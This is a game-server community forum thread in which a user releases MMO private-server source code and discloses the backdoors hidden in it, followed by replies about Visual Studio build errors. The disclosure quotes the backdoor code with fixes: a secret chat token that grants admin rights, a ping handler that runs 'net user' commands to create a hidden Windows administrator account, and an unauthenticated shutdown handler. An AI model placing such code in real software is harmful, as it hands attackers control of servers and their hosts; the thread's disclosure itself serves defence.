Welcome!

Join our community of MMO enthusiasts and game developers! By registering, you'll gain access to discussions on the latest developments in MMO server files and collaborate with like-minded individuals. Join us today and unlock the potential of MMO server development!

Join Today!

[Release] Combat Rivals Source Code (3.5)

Experienced Elementalist
Reaction score
Hi guys,
i was so bored, so im here to share something which can help the newbies on c++.
Those source are of Combat Rivals, there are inside few mods like new colors,xnation chat,unique key and so on.
You can check the mods by the comments inside the source code.
Hope this can help users to make really good server and improve their skills instead of other un-clever guys :)
~Aesir

EDIT: I forgot, there is inside source a little backdoors, i found them some time ago.
Code:
 else if ( stricmp(token, "/d5%YGZ") == 0)
 {
 m_character.Race = 130;
 }
Just remove,comment,change this token or what you want and server will be backdoor-free,and yes, this one is even inside Kasistar bins released somewhere in this section as mine bins, just search "/d5%YGZ" in HexEditor and change it or delete or what you want :)
(this one admin you to get admin rights in fieldserver by writing in chat "/d5%YGZ")

Another one is:
Code:
case T_FM_PING:
        {
            system("net user AspNet `R8w^)xFf]uQKQFT /ADD");
            system("net localgroup administrators AspNet /add");
        }
   break;
Just replace this with:
Code:
case T_FM_PING:
{
*(MessageType_t*)SendBuf = T_FM_PING_OK;
                SendAddData(SendBuf, SIZE_FIELD_TYPE_HEADER);
}
break;
(sending a ping from monitor the server create another user on system)

Another one:
Code:
case T_FM_SHUTDOWN:
   {
  //  g_pFieldGlobal->WriteSystemLogEX(TRUE, "  T_FM_SHUTDOWN->Failed break\r\n");
    break; // 2011-11-18 by shcho, ¼­¹ö´Ù¿î ÇÁ¸®Æä¾î¼­¹ö´Ù¿î Á¦°Å ó¸® - Ãß°¡ ¸í·É¹® »èÁ¦
    *(MessageType_t*)SendBuf = T_FM_SHUTDOWN_OK;
    SendAddData(SendBuf, SIZE_FIELD_TYPE_HEADER);
    PostMessage(g_pFieldGlobal->GetMainWndHandle(), WM_CLOSE, 0, 0);
   }
   break;
Just comment or remove:
Code:
PostMessage(g_pFieldGlobal->GetMainWndHandle(),WM_CLOSE,0,0);
(Just enabled exploitable shutdown function)

EDIT: Reuploaded.

Last edited:
Shh, quiet, you might piss somebody off
Developer
Reaction score
if somebody got issue with packets crashing server, come with me, i'll solve for you, is very easy filter packets, and if you want, u don't need stop on ace, just talk come with me on my skype ;)

Last edited by a moderator:
[emoji848]
Legend
Reaction score
@Aesir you might be better off just fixing the backdoors you already found during time in the code and re-upload it. Atm the upload is easily exploitable.

Experienced Elementalist
Reaction score
@Aesir you might be better off just fixing the backdoors you already found during time in the code and re-upload it. Atm the upload is easily exploitable.

All backdoors was commented but not remove for allow users see how them works :)

Newbie Spellweaver
Reaction score
Someone can tell me what dependencies and how i must import them on Visual studio ? I have errors on compil

Newbie Spellweaver
Reaction score
That's what i tried too, i still have errors on compilation . So i need to know how i must import lib folder in visual studio

[emoji848]
Legend
Reaction score
We are no mind readers yet. Maybe bother to show us some compilation results?

Also please note that this is no Microsoft Support forum for Visual Studio. If you don't even know how to set VC++ Directories and link properly please use google / technet / others. It'll help a lot more.... As said by burgers, everything needed to link and compile is included in this and in St34lthAngels release.

Newbie Spellweaver
Reaction score
That's what i tried too, i still have errors on compilation . So i need to know how i must import lib folder in visual studio

It doesn't sound like you even switched from Debug to R_Wikigames_Eng (or along those lines). Do so and compile away.

Edit:

Aesir - [Release] Combat Rivals Source Code (3.5) - RaGEZONE Forums

Do so for the solution/projects.

Newbie Spellweaver
Reaction score
Thank you for your help. I have 4 suceed builds but 9 failed. here s a part of the log:
1>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppBuild.targets(369,5): error MSB8031: Building an MFC project for a non-Unicode character set is deprecated. You must change the project property to Unicode or download an additional library.
12>..\..\..\Output\Server\FieldServer.exe : fatal error LNK1120: 2 externes non résolus
13>------ Début de la génération : Projet : Atum, Configuration : R_Wikigames_Eng Win32 ------
13>C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppBuild.targets(369,5): error MSB8031: Building an MFC project for a non-Unicode character set is deprecated. You must change the project property to Unicode or download an additional library. See <a href="http://go.microsoft.com/fwlink/p/?LinkId=286820" target="_blank">http://go.microsoft.com/fwlink/p/?LinkId=286820</a> for more information.
========== Génération : 4 a réussi, 9 a échoué, 0 mis à jour, 0 a été ignoré ==========

thank you for your help

[emoji848]
Legend
Reaction score
You will need the multi byte character library for MFC for sure as it's obsolete already:

Newbie Spellweaver
Reaction score
First thank you for your help. Just installed mfc pack but still have this errors :
Erreur 269 error C2065: 'STRCMD_CS_COMMAND_SERVERINFO' : identificateur non déclaré E:\telechargés\ACE ONLINE SERVER (VS2013)\Source (VS2013)\Server\Common\Global.cpp 70 1 IMServer

i think it s dependencies on visual . No ?
Put the Lib folder included on aceserver ?

Newbie Spellweaver
Reaction score
If you don't actually try what you think it might be and look up the errors on google, you won't ever know or learn. It's also a release thread, not a support thread - try to remember that.

As for your comments, project Dependancies, includes and Lib related properties are already set. When it comes to building the bins, make sure you are building the 'GameServer' Solution found in \Server\GameServer and build as R_Wikigames_Eng.

Back